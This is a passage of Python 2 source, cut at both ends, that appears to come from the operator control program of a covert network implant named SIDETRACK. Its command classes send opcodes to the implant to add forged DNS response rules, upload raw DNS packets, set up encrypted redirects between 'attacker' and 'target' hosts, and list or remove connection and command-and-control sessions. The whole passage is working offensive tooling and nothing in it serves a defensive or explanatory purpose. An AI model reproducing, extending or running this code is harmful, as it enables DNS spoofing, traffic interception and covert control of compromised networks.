argString = argString + ", " + self.ProcessArg(args[i]) argString = argString + ')' print argString exec(argString) def runCmd(self, args): cmd = SIDECMD_DNSACTION() cmd.implant = self.implant argString = 'tmp = cmd.run(self.lastRule' for i in range(len(args)): argString = argString + ", " + self.ProcessArg(args[i]) argString = argString + ')' print argString exec(argString) def run(self, filename): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) file = open(filename,'r') self.lastRule = 0 while 1: line = 
file.readline() if not line: line = None return (1, "Input from file complete") args = base.SplitCommandString(string.strip(line)) if len(args) == 0: continue elif args[0][0:1] == '#' or args[0] == '': continue elif args[0] == "rule": self.runRule(args) print "Rule %d added\n" % (self.lastRule) elif args[0] == "set": self.runSet(args) else: self.runCmd(args) return (0, "problem") ########################################################################## # DNSADD class # op code: 0x18 ######################################################################### class SIDECMD_DNSADD(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsadd" self.usage = "dnsadd <from ip> <from mask> <longevity> <type> <class> <name> [dns flags]" self.info = "Add a DNS entry into sidetrack (see also dnsset)" self.op = 0x18L def run(self,ip,mask,length,rtype,rclass,name,flags=0x0080L): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) ipStr = self.ConvertIP(ip) maskStr = self.ConvertIP(mask) rtype = self.ConvertType(rtype) rclass = self.ConvertClass(rclass) name = self.ConvertName(name) length = self.ConvertTime(length) self.data = ipStr + maskStr + struct.pack("!LHHHH",length,flags,\ rtype,rclass,len(name)) +name self.Query() if( self.op == 0x18L and self.res == 0x1L ): dnsRes = struct.unpack("!l",self.data[0:4])[0] return (dnsRes, "Add successful, rule number: %d" % dnsRes) else: return (0, "Add failed") ########################################################################## # DNSREMOVE class # op code: 0x19 ######################################################################### class SIDECMD_DNSREMOVE(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsrm" self.usage = "dnsrm <rule|all>" self.info = "Remove a dns rule" self.op = 0x19L def run(self,rule): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if type(rule) == type("a") and string.upper(rule)[:1] == 'A': rule = 0 self.data = struct.pack("!l",rule) self.Query() if self.op == 0x19L and self.res == 0x01L: return (1,"Rule(s) removed") else: return (0,"unable to remove rule(s)") ########################################################################## # DNSSET class # op code: 0x20 ######################################################################### class SIDECMD_DNSSET(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsset" self.usage = "dnsset <rule> <ignore|count|active>" self.info = "Turn a DNS rule on or off" self.op = 0x20L def run(self,rule,onoff): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) self.data = struct.pack("!l",rule) if onoff[0:1] == "a" or onoff[0:1] == "A": self.data = self.data + struct.pack("!h", 2) elif onoff[0:1] == "c" or onoff[0:1] == "C": self.data = self.data + struct.pack("!h", 1) else: self.data = self.data + struct.pack("!h", 0) self.Query() if self.op == 0x20L and self.res == 0x01L: return (1,"rule %d successfully set to %s" %\ (rule, onoff)) else: return (0,"unable to set rule to %s" % onoff) ########################################################################## # DNSRAW class # op code: 0x21 ######################################################################### class SIDECMD_DNSRAW(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsraw" self.info = "Upload a binary dns response packet" self.usage = "dnsraw <rule> <filename>" self.op = 0x21L def run(self, rule, filename): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0, msg) file = open(filename,'r') file.seek(0,2) filesize = file.tell() 
file.seek(0,0) maxchunksize = self.implant.packetSize - 34 numchunks = filesize / maxchunksize if filesize%maxchunksize > 0: numchunks = numchunks + 1 for i in range(numchunks): self.data = file.read(maxchunksize) self.data = struct.pack("!LHHHH",rule,i,numchunks,4,\ len(self.data)) + self.data self.Query() if (self.op != 0x21L or self.res != 0x1L): return (0,"Binary upload failed at chunk %d"%(i+1)) return (1,"Binary upload of %d chunks successful"%(numchunks)) ########################################################################## # DNSACTION class # op code: 0x21 ######################################################################### class SIDECMD_DNSACTION(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnsaction" self.info = "Set the action for a rule" self.usage = "dnsaction <rule> <ans|auth|add> <name> <type> <class> <ttl> <data>" self.op = 0x21L def run(self,rule,sect,name,rtype,rclass,ttl,data): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) name = self.ConvertName(name) sect = self.ConvertSection(sect) rtype = self.ConvertType(rtype) rclass = self.ConvertClass(rclass) ttl = self.ConvertTime(ttl) if rtype == 1: data = self.ConvertIP(data) else: data = self.ConvertName(data) self.data = struct.pack("!LLHHHHH", rule, ttl, sect, rtype,\ rclass,\ len(name),\ len(data))+\ name+data self.Query() if self.op == 0x21L and self.res == 0x01L: return (1,"%s action for rule %d set successfully" % \ (sect, rule)) else: return (0,"Could not set action") ########################################################################## # DNSLIST class # op code: 0x22 ######################################################################### class SIDECMD_DNSLIST(SIDECMD): def __init__(self): SIDECMD.__init__(self) self.name = "dnslist" self.usage = "dnslist [-v] [rule] [section]" self.info = "Retrieve a section of a rule from SIDETRACK" self.op = 0x22L def ParseReturn(self): if self.implant.version < 2.0: self.lastport = 0 (self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\ self.lastIP, self.lastTime, self.seen, self.flag, self.ttl, \ self.dnsflags, self.rtype, self.rclass, self.rsec, \ self.nlen, self.dlen) =\ struct.unpack("!lLLLLLLHHLHHHHHH", self.data[0:48]) self.dnsname = self.data[48:48+(self.nlen)] self.dnsdata = self.data[48+(self.nlen):48+(self.nlen)+(self.dlen)] else: (self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\ self.lastIP, self.lastTime, self.seen, self.flag, self.lastport, \ self.dnsflags, self.ttl, self.rtype, self.rclass, self.rsec, \ self.nlen, self.dlen) =\ struct.unpack("!lLLLLLLHHHHLHHHHH", self.data[0:50]) self.dnsname = self.data[50:50+(self.nlen)] self.dnsdata = self.data[50+(self.nlen):50+(self.nlen)+(self.dlen)] def GetRuleString(self): printOut = "%10d %s/%s %-7s %s\n" % \ (self.rule, self.ConvertToDot(self.fromIP), self.ConvertToDot(self.fromMask), self.FlagConvert(self.flag), time.ctime(self.longevity+self.implant.timediff)[4:]) printOut = printOut + " %5s: %-5d %s:%d %s\n" %\ ("count", self.seen, self.ConvertToDot(self.lastIP), self.lastport, time.ctime(self.lastTime + self.implant.timediff)) return printOut + self.GetSectionString() def GetRule(self,rule,sec=0): sec = self.ConvertSection(sec) #print "Getting section %d of rule %d\n" % (sec,rule) self.data = struct.pack("!LLH",rule,0,sec) self.Query() if self.op == 0x22L and self.res == 0x01L: self.ParseReturn() printOut = self.GetRuleString() return (1, printOut) else: return (0,"Error receiving result\n") def GetNextRule(self,lastRule,sec=0): 
sec = self.ConvertSection(sec) print "Getting section %d of rule after %d\n" % (sec,lastRule) self.data = struct.pack("!LLH",0,lastRule,sec) self.Query() if self.op == 0x22L and self.res == 0x01L: self.ParseReturn() if self.retVal == 0: lastRule = self.rule elif self.retVal == 2: lastRule = -2 else: lastRule = -1 if lastRule == -2: lastRule = -1 printOut = 'There are currently no rules' else: printOut = self.GetRuleString() return (lastRule, printOut) elif lastRule == 0: print self.res return (0,"There are currently no rules!") else: return (0,"Error receiving result\n") def GetSectionString(self): printOut = " %5s: %-5s %-3s %-5d " % \ (self.SectionConvert(self.rsec), self.TypeConvert(self.rtype), self.ClassConvert(self.rclass), self.ttl&0xffffffL) if self.nlen: try: printOut = printOut + "%s\n" % \ (self.NameConvertName(self.dnsname)) except: printOut = printOut + "\n N: %s\n" %\ (self.HexConvert(self.dnsname,10)) if self.dlen: if self.rtype == 1 and self.dlen == 4: printOut = printOut + \ " D: %s\n" % \ (self.ConvertToDot(self.dnsdata)) else: printOut = printOut + \ " D: %s\n" %\ (self.NameConvert(self.dnsdata,10)) return printOut def GetSection(self,rule,section): print "Getting section %d of rule %d\n" % (section,rule) self.data = struct.pack("!LLH",rule,0,section) self.Query() if self.op == 0x22L and self.res == 0x01L: self.ParseReturn() if self.rsec == 4: return (1, '') return (1,self.GetSectionString()) else: return (0, "Could not get section") def preRuleString(self): return "-----------------------------------------------------------------------\n" def postRuleString(self): return '' def runAll(self): moreRules = 1 lastRule = 0 printOut = '' while moreRules: res = self.GetNextRule(lastRule) if res[0] == 0: return res elif res[0] == -1: moreRules = 0 lastRule = self.rule else: lastRule = res[0] printOut = printOut + self.preRuleString() printOut = printOut + res[1] for i in range(1,4): sec = self.GetSection(lastRule, i) if sec[0] == 0: return (0, printOut) printOut = printOut + sec[1] printOut = printOut + self.postRuleString() return (1, printOut) def run(self,rule=-1, sec=-1, ext=-1): msg = echocmd.ECHOCMD.run(self) if msg != None: return (0,msg) if rule == -1: lastRule = 0 moreRules = 1 printOut = '' while moreRules: res = self.GetNextRule(lastRule) if res[0] == 0: return res elif res[0] == -1: moreRules = 0 lastRule = self.rule else: lastRule = res[0] printOut = printOut + res[1] elif rule == "-v": if sec == -1: return self.runAll() else: if ext == -1: res = self.GetRule(sec) if res[0] == 0: return res printOut = res[1] for i in range(1,4): sd = self.GetSection(sec, i) if sd[0] == 0: return (0, printOut) printOut = printOut + sd[1] else: return self.GetRule(sec,ext) else: if sec == -1: return self.GetRule(rule) else: # Rule != 0 and sec != -1 return self.GetRule(rule,sec) return (1,printOut) ########################################################################## # DNSREAD class ######################################################################### class SIDECMD_DNSSAVE(SIDECMD_DNSLIST): def __init__(self): SIDECMD_DNSLIST.__init__(self) self.name = "dnssave" self.usage = "dnssave [rule] [filename]" self.info = "Save one of more rules" def ToOct(self, data): if type(data) == type(0x0L) or type(data) == type(0): ret = '' if data > 255: if data > 65535: if data > 16777215: ret = ret + "\\%o" % ((int)(data/16777216)&0xffL) ret = ret + "\\%o" % ((int)(data/65536)&0xffL) ret = ret + "\\%o" % ((int)(data/256)&0xffL) ret = ret + "\\%o" % (data & 0xffL) else: reg = 
regex.compile("^[a-zA-Z0-9-_.]*$")
        ret = ''
        for i in range(len(data)):
            if reg.match(data[i:i+1]) != None:
                ret = ret + data[i:i+1]
            else:
                ret = ret + "\\%o" % \
                      struct.unpack("!H",'\000'+data[i:i+1])[0]
        return '"' + ret + '"'

    def NameConvertName(self, name):
        reg = regex.compile("^[a-zA-Z0-9-_.]*$")
        ret = ''
        sp = 0
        if type(name) != type(0):
            while name[sp:sp+1] != '\000':
                namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
                #print namelen
                if sp != 0:
                    ret = ret + '.'
                for i in range(1,namelen+1):
                    if reg.match(name[sp+i:sp+i+1]) != None:
                        ret = ret + name[sp+i:sp+i+1]
                    else:
                        raise TypeError, self.ToOct(name)
                sp = sp+1+namelen
        return ret

    def NameConvert(self, name, padding=0):
        try:
            return self.NameConvertName(name)
        except:
            return self.ToOct(name)

    def GetSectionString(self):
        printOut = "%s %s %s %s %d " % \
                   (self.SectionConvert(self.rsec),
                    self.NameConvert(self.dnsname),
                    self.TypeConvert(self.rtype),
                    self.ClassConvert(self.rclass),
                    self.ttl&0xffffffL)
        if self.dlen:
            if self.rtype == 1 and self.dlen == 4:
                printOut = printOut + self.ConvertToDot(self.dnsdata)
            else:
                printOut = printOut + self.NameConvert(self.dnsdata,10)
        return printOut + '\n'

    def GetRuleString(self):
        printOut = "rule %s %s %d %s %s %s 0x%04x\n" % \
                   (self.ConvertToDot(self.fromIP),
                    self.ConvertToDot(self.fromMask),
                    self.longevity - self.rule,
                    self.TypeConvert(self.rtype),
                    self.ClassConvert(self.rclass),
                    self.NameConvert(self.dnsname),
                    self.dnsflags)
        return printOut

    def preRuleString(self):
        return "# -----------------------------------------------------------------------\n"

    def postRuleString(self):
        return "set %s\n" % (self.FlagConvert(self.flag))

    def run(self,rule=-1, file=-1):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if rule == -1:
            # All Rules to stdout
            return self.runAll()
        elif type(rule) == type(''):
            # All rules to file
            out = open(rule,'w')
            res = self.runAll()
            if res[0] == 0:
                return res
            out.write(res[1])
            out = None
            return res
        elif file == -1:
            # Single rule to stdout
            res = self.GetRule(rule)
            if res[0] == 0:
                return res
            printOut = res[1]
            for i in range(1,4):
                sd = self.GetSection(rule,i)
                if sd[0] == 0:
                    return (0,printOut + sd[1])
                printOut = printOut + sd[1]
            return (1,printOut + self.postRuleString())
        else:
            # Single rule to file
            out = open(file,"w")
            res = self.GetRule(rule)
            if res[0] == 0:
                return res
            printOut = res[1]
            for i in range(1,4):
                sd = self.GetSection(rule,i)
                if sd[0] == 0:
                    return (0,printOut + sd[1])
                printOut = printOut + sd[1]
            printOut = printOut + self.postRuleString()
            out.write(printOut)
            out = None
            return (1,printOut)

#############################################################################
# REDIRADD class
#       opcode 0x23
#############################################################################
class SIDECMD_REDIRADD(SIDECMD):
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "rediradd"
        self.usage = "rediradd <protocol | all> <host_A> <host_B> [-insert <rule>]\n [-ttl (reset | <num>)] [-nocrypto] [-afix] [-tfix] [-samesum]\n [-longevity <time>] [-conntimeout <time>]\n\n <host_A>/<host_B> format: <ip_address>[:<local_port>/<remote_port>]\n"
        self.info = "Add a REDIRECT rule into SIDETRACK's rule set"
        self.op = 0x23L

    def parseProto(self,proto):
        origproto = proto
        if type(proto) == type ('a'):
            proto = string.upper(proto)[:1]
            if proto == "T":
                proto = 6
            elif proto == "U":
                proto = 17
            elif proto == "I":
                proto = 1
            elif proto == "A":
                proto = 0
            else:
                raise ValueError, origproto
        return proto

    def parseHostInfo(self,host):
        #split the ip from the ports
        res = string.split(host,":")
        if len(res) == 1:
            try:
                host = None
                ipaddr = self.ConvertIP(res[0])
            except:
                host = base.sessionDict[res[0]]
                ipaddr = self.ConvertIP(host.target.GetIP())
            return host,ipaddr,-1,-1
        elif len(res) == 2:
            ports = string.split(res[1],"/")
            if len(ports) != 2:
                raise ValueError, host
            if ports[0] == "*":
                ports[0] = -1
            else:
                ports[0] = eval(ports[0])
            if ports[1] == "*":
                ports[1] = -1
            else:
                ports[1] = eval(ports[1])
            try:
                host = None
                ipaddr = self.ConvertIP(res[0])
            except:
                host = base.sessionDict[res[0]]
                ipaddr = self.ConvertIP(host.target.GetIP())
            return host,ipaddr,ports[0],ports[1]
        else:
            raise ValueError, host

    def run(self,protocol,attacker,target,
            opt0=None,opt1=None,opt2=None,opt3=None,opt4=None,opt5=None,
            opt6=None,opt7=None,opt8=None,opt9=None,first=1):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg,0)
        optList = [opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9]
        allProtoAT = 0
        allProtoTA = 0
        allRedir = 0
        ttl_reset = 1
        ttl_mod = 0
        munge = 1
        encrypt = 0
        afix = 1
        tfix = 1
        ident = 0
        seq = 0
        insert = 0
        samesum = 0
        longevity = 14400
        conn_to = 14400
        cmd = None
        localredir = 0
        if first:
            munge = 0
            encrypt = 1
        protocol = self.parseProto(protocol)
        if protocol == 0:
            allRedir = 1
        host,A_ip,A_port,SA_port = self.parseHostInfo(attacker)
        host2,T_ip,T_port,ST_port = self.parseHostInfo(target)
        if host != None:
            hpn = host.implant.parent.name
            myname = host.name
            attacker = re.sub(myname,hpn,attacker)
            cmd = host.GetCommand('rediradd')
            res = cmd.run(protocol,attacker,\
                          "%s:%d/%d"%(self.implant.session.target.ip,SA_port,A_port),\
                          opt0,opt1,opt2,opt3,opt4,opt5,opt6,opt7,opt8,opt9,0)
            if res[0] == 0:
                return res
            if res[2] != 0 and cmd.implant.session.target.hasAnotherAddress == 1:
                A_ip = struct.pack("!L",res[2])
        if SA_port == -1 and T_port != -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if SA_port != -1 and T_port == -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if ST_port == -1 and A_port != -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if ST_port != -1 and A_port == -1:
            base.db(1,"problem")
            raise ValueError, "Invalid ports"
        if SA_port == -1 and T_port == -1:
            allProtoAT = 1
            SA_port = 0
            T_port = 0
        if ST_port == -1 and A_port == -1:
            allProtoTA = 1
            ST_port = 0
            A_port = 0
        # Parse the args
        i=0
        while i < len(optList):
            if optList[i] == None:
                break
            elif string.upper(optList[i])[:3] == '-TT':
                i = i+1
                if type(optList[i]) == type(1):
                    ttl_mod = optList[i]
                    if optList[i] < 0:
                        ttl_reset = 0
                    else:
                        ttl_reset = 1
                elif string.upper(optList[i])[:1] == 'R':
                    ttl_mod = 0
                    ttl_reset = 1
                elif optList[i][0] == '+' or optList[i][0] == '-':
                    ttl_mod = eval(optList[i])
                    ttl_reset = 0
                else:
                    raise ValueError, optList[i]
                #if ttl_reset == 0:
                #    ttl_mod = struct.pack("!H",ttl_mod)
                #else:
                #    ttl_mod = struct.pack("!h",ttl_mod)
            elif string.upper(optList[i])[:2] == '-I':
                i = i+1
                insert = optList[i]
            elif string.upper(optList[i])[:2] == '-L':
                i = i+1
                longevity = self.ConvertTime(optList[i])
            elif string.upper(optList[i])[:2] == '-C':
                i = i+1
                conn_to = self.ConvertTime(optList[i])
            elif string.upper(optList[i])[:2] == '-N':
                munge = 0
                encrypt = 0
            elif string.upper(optList[i])[:2] == '-E':
                encrypt = 1
            elif string.upper(optList[i])[:2] == '-A':
                afix = 0
            elif string.upper(optList[i])[:3] == '-TF':
                tfix = 0
            elif string.upper(optList[i])[:2] == '-S':
                samesum = 1
            else:
                raise ValueError, optList[i]
            i = i + 1
        if T_ip == self.ConvertIP(self.implant.session.target.ip):
            encrypt = 0
            munge = 0
            localredir = 1
        flags = 1 | afix << 1 | tfix << 2 | ttl_reset << 3 \
                | encrypt << 4 | munge << 5 | allRedir << 6 | allProtoAT << 7 \
                | allProtoTA << 8 | base.ccSupport << 9 | samesum << 10
        rd = crypto.GetRandom()
        if localredir == 0:
            ident = struct.unpack("!H",rd[0:2])[0]
        if munge:
            munge = struct.unpack("!L",rd[2:6])[0]
            if munge & 1L == 0:
                munge = munge + 1
            if munge & 0xffL == 1:
                munge = munge + 10
        if protocol == 6 and localredir == 0 and encrypt:
            seq = struct.unpack("!L", rd[22:26])[0]
        if encrypt:
            encrypt = struct.unpack("!LLLL",rd[6:22])
        else:
            encrypt = (0,0,0,0)
        base.db(2, seq)
        base.db(2, ident)
        self.redir =REDIRECT(self,insert,longevity,conn_to,protocol,A_ip,T_ip,\
                             ident,seq,munge,encrypt,ttl_mod,flags,\
                             A_port,SA_port,T_port,ST_port)
        ruleRes = self.redir.add()
        if ruleRes[0] and cmd != None:
            if cmd.redir != None:
                cmd.redir.next = self.redir
                self.redir.prev = cmd.redir
        return ruleRes

#############################################################################
# REDIRLIST class
#       opcode 0x24
#############################################################################
class SIDECMD_REDIRLIST(SIDECMD):
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "redirlist"
        self.usage = "redirlist [rule]"
        self.info = "List redirect entries."
        self.op = 0x24L

    def parseReturn(self):
        self.ret, self.rule, self.longevity, self.conn_to, \
        self.A_ip, self.T_ip, self.flags = \
            struct.unpack("!LLLLLLH",self.data[:26])
        self.ttl_mod = struct.unpack("!H",'\000'+self.data[26:27])[0]
        self.protocol = struct.unpack("!H", '\000'+self.data[27:28])[0]
        self.conns, self.ATcount, self.TAcount, self.seen, self.munge, \
        self.A_port, self.SA_port, self.T_port, self.ST_port, \
        self.seq = struct.unpack("!LLLLLHHHHL",self.data[28:60])
        self.A_ip = self.ConvertToDot(self.A_ip)
        self.T_ip = self.ConvertToDot(self.T_ip)
        self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
        if self.protocol == 1:
            self.protocol = "ICMP"
        elif self.protocol == 6:
            self.protocol = "TCP"
        elif self.protocol == 17:
            self.protocol = "UDP"
        elif self.protocol == 0:
            self.protocol = "ALL"
        else:
            self.protocol = eval("'%d'" % (self.protocol))
        if (self.flags & 0x1L):
            self.active = "ACTIVE"
        else:
            self.active = "INACTIVE"
        self.opts = ''
        if not (self.flags & 0x2L):
            self.opts = self.opts + '-afix '
        if not (self.flags & 0x4L):
            self.opts = self.opts + '-tfix '
        if (self.flags & 0x400L):
            self.opts = self.opts + '-samesum '
        if self.flags & 0x8L:
            if self.ttl_mod == 0:
                self.opts = self.opts + '-ttl reset '
            else:
                self.opts = self.opts + '-ttl %d ' % (self.ttl_mod)
        else:
            if self.ttl_mod > 127:
                self.opts = self.opts + '-ttl %d' % (self.ttl_mod-256)
            else:
                self.opts = self.opts + '-ttl +%d ' % (self.ttl_mod)
        if not (self.flags & 0x30L):
            self.opts = self.opts + '-nocrypto '

    def outputPorts(self,attacker,flags,ip,lport,rport):
        if flags & 0x40 or flags & 0x180 == 0x180:
            return ip
        if attacker and flags & 0x80:
            rport = '*'
        if attacker and flags & 0x100:
            lport = '*'
        if not attacker and flags & 0x80:
            lport = '*'
        if not attacker and flags & 0x100:
            rport = '*'
        if type(lport) != type('*'):
            lport = '%d' %(lport)
        if type(rport) != type('*'):
            rport = '%d' %(rport)
        return '%s:%s/%s' % (ip,lport,rport)

    def outputCurrent(self):
        res = '%-5d %s Connection timeout: %s Expires: %s\n' % \
              (self.rule,self.active,\
               self.TimeConvert(self.conn_to),self.longevity)
        res = res + ' %s %s %s %s\n' % \
              (self.protocol,
               self.outputPorts(1,self.flags,self.A_ip,self.A_port,self.SA_port),
               self.outputPorts(0,self.flags,self.T_ip,self.T_port,self.ST_port),
               self.opts)
        res = res + ' Connections: %-4d Last seen %s\n A->T count: %-6d T->A count: %-6d\n' % \
              (self.conns,
               time.ctime(self.seen-self.implant.timediff)[4:],
               self.ATcount, self.TAcount)
        return (1, res)

    def listOne(self,rule):
        self.data = struct.pack("!LL",rule,0)
        self.Query()
        if self.op == 0x24L and self.res == 0x01L:
            self.parseReturn()
            return self.outputCurrent()
        else:
            return (0, "Implant did not return a valid response")

    def listAll(self):
        out = ''
        self.ret = 1
        self.rule = 0
        while self.ret == 1:
            self.data = struct.pack("!LL",0,self.rule)
            self.Query()
            if self.op == 0x24L and self.res == 0x01L:
                self.parseReturn()
                res = self.outputCurrent()
                if res[0] == 0:
                    return res
                else:
                    out = out + res[1]
            else:
                return (0, "Error receiving result")
        if self.ret == 2:
            return (1, "No rules to list")
        else:
            return (1, out)

    def run(self,rule=None):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        if rule == None:
            res = self.listAll()
        else:
            res = self.listOne(rule)
        return res

#############################################################################
# REDIRSET class
#       opcode 0x25
#############################################################################
class SIDECMD_REDIRSET(SIDECMD):
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "redirset"
        self.usage = "redirset <rule|all> <active|inactive>"
        self.info = "Set a redirect rule as being active or inactive."
        self.op = 0x25L

    def run(self, rule, status):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
            rule = 0
        if string.upper(status[:1]) == 'A':
            status = 1
        elif string.upper(status[:1]) == 'I':
            status = 0
        i=0
        while i < len(self.implant.rules):
            if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
                res = self.implant.rules[i].set(status)
                if res[0] == 0:
                    return res
                elif rule != 0:
                    break
            i = i + 1
        base.db(3,res[1])
        if i == len(self.implant.rules) and rule != 0:
            return (0, "Rule does not exist")
        else:
            return (1, "Rule(s) set successfully")

#############################################################################
# CONNREMOVE class
#       opcode 0x28
#############################################################################
class SIDECMD_CONNREMOVE(SIDECMD):
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "connrm"
        self.usage = "connrm <rule|all>"
        self.info = "Remove a connection entry (or all connection entries)"
        self.op = 0x28L

    def run(self, rule):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
            rule = 0
        self.data = struct.pack("!L",rule)
        self.Query()
        if self.op == 0x28L and self.res == 0x1L:
            return (1, "Connection(s) removed successfully")
        else:
            return (0, "Error removing connection(s)")

#############################################################################
# CONNLIST class
#       opcode 0x27
#############################################################################
class SIDECMD_CONNLIST(SIDECMD):
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "connlist"
        self.usage = "connlist [-c <rule> | -r <redir>]"
        self.info = "Lists a (or all) connection rules"
        self.op = 0x27L

    def convertState(self,state):
        if state == 0:
            return "INIT"
        elif state == 1:
            return "SYN_SENT"
        elif state == 2:
            return "SYN_RCVD"
        elif state == 3:
            return "SYN_ACK_RCVD"
        elif state == 4:
            return "SYN_ACK_SENT"
        elif state == 5:
            return "ESTABLISHED"
        elif state == 6:
            return "FIN_SENT"

    def parseReturn(self):
        self.ret,self.rule,self.redir,self.longevity = struct.unpack("!LLLL",self.data[0:16])
        self.protocol = struct.unpack("!H", '\000'+self.data[16:17])[0]
        sendstate = struct.unpack("!H",'\000'+self.data[17:18])[0]
        recvstate = struct.unpack("!H",'\000'+self.data[18:19])[0]
        sender = struct.unpack("!H",'\000'+self.data[19:20])[0]
        self.at_cnt, self.ta_cnt, self.last, self.Aip, self.SAip, self.Tip,\
        self.STip, self.Aport, self.SAport, self.Tport, self.STport \
            = struct.unpack("!LLLLLLLHHHH",self.data[20:56])
        self.leftState = ''
        self.rightState = ''
        if self.protocol == 6:
            self.protocol = "TCP"
            if sender == 1:
                self.leftState = self.convertState(sendstate)
                self.rightState = self.convertState(recvstate)
            else:
                self.leftState = self.convertState(recvstate)
                self.rightState = self.convertState(sendstate)
        elif self.protocol == 17:
            self.protocol = "UDP"
        else:
            self.protocol = '%d' %(self.protocol)

    def outputCurrent(self):
        res = '%d %s Redir rule: %d Last seen: %s\n %s:%d <-%s(%d)-> %s:%d\n %s:%d <-%s(%d)-> %s:%d\n' % \
              (self.rule,self.protocol,self.redir,
               time.ctime(self.last+self.implant.timediff)[4:],
               self.ConvertToDot(self.Aip),self.Aport,
               self.leftState,self.at_cnt,
               self.ConvertToDot(self.SAip),self.SAport,
               self.ConvertToDot(self.STip),self.STport,
               self.rightState,self.ta_cnt,
               self.ConvertToDot(self.Tip),self.Tport)
        return (1,res)

    def listAll(self,redir):
        out = ''
        self.ret = 1
        self.rule = 0
        while self.ret == 1:
            self.data = struct.pack("!LLL",0,self.rule,redir)
            self.Query()
            if self.op == 0x27L and self.res == 0x01L:
                self.parseReturn()
                res = self.outputCurrent()
                if res[0] == 0:
                    return res
                else:
                    out = out + res[1]
            else:
                return (0, "Error receiving result")
        if self.ret == 2:
            return (1,"No connections to list")
        else:
            return (1,out)

    def listOne(self,rule):
        self.data = struct.pack("!LLL",rule,0,0)
        self.Query()
        if self.op == 0x27L and self.res == 0x01L:
            self.parseReturn()
            return self.outputCurrent()
        else:
            return (0, "Implant did not return a valid response")

    def run(self, option=None, value=None):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        rule = 0
        redir = 0
        if option != None:
            if option == '-c':
                rule = value
            elif option == '-r':
                redir = value
            else:
                raise TypeError, option
        if rule == 0:
            res = self.listAll(redir)
        else:
            res = self.listOne(rule)
        return res

#############################################################################
# REDIRREMOVE class
#       opcode 0x26
#############################################################################
class SIDECMD_REDIRREMOVE(SIDECMD):
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "redirrm"
        self.usage = "redirrm <rule|all>"
        self.info = "Remove a redirect rule (or all redirect rules)"
        self.op = 0x26L

    def run(self, rule):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        removed = 0
        if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
            rule = 0
        i = 0
        while i < len(self.implant.rules):
            if self.implant.rules[i].remoteRuleNum == rule or rule == 0:
                res = self.implant.rules[i].remove()
                if res[0] == 0:
                    return res
                removed = 1
                i = i - 1
            i = i + 1
        if removed == 0 or rule == 0:
            self.data = struct.pack("!L",rule)
            self.Query()
            if self.op == 0x26L and self.res == 0x1L:
                return (1, "Rule(s) removed successfully")
            else:
                return (0, "Error removing rule(s)")
        else:
            return res

#############################################################################
# CCLIST class
#       opcode 0x29
#############################################################################
class SIDECMD_CCLIST(SIDECMD):
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "cclist"
        self.usage = "cclist"
        self.info = "List all of the command and control sessions"
        self.op = 0x29L

    def parseReturn(self):
        self.more,self.rule,self.longevity,self.srcip,self.dstip,\
        self.srcport,self.dstport = struct.unpack("!LLLLLHH",self.data[0:24])
        if self.more & 2L:
            self.current = "(CURRENT) "
        else:
            self.current = ""
        self.longevity = time.ctime(self.longevity-self.implant.timediff)[4:]
        self.srcip = self.ConvertToDot(self.srcip)
        self.dstip = self.ConvertToDot(self.dstip)

    def displayCurrent(self):
        # STUB: Make this better!
        if self.rule == 0xffffffffL:
            return ""
        res = "%d %s%s:%d<->%s:%d Expires: %s\n" % \
              (self.rule,self.current,self.srcip,self.srcport,\
               self.dstip,self.dstport,self.longevity)
        return res

    def run(self):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        if self.implant.version < 2.0:
            return (0, "This feature is only available in versions >= 2.0")
        res = ""
        last = 0L
        self.more = 1
        while self.more & 1L:
            self.data = struct.pack("!L",last)
            self.Query()
            if self.op == 0x29L and self.res == 0x1L:
                self.parseReturn()
                res = self.displayCurrent() + res
                last = self.rule
            else:
                return (0, "Error getting CC rules")
        return (1,res)

#############################################################################
# CCREMOVE class
#       opcode 0x2a
#############################################################################
class SIDECMD_CCREMOVE(SIDECMD):
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "ccremove"
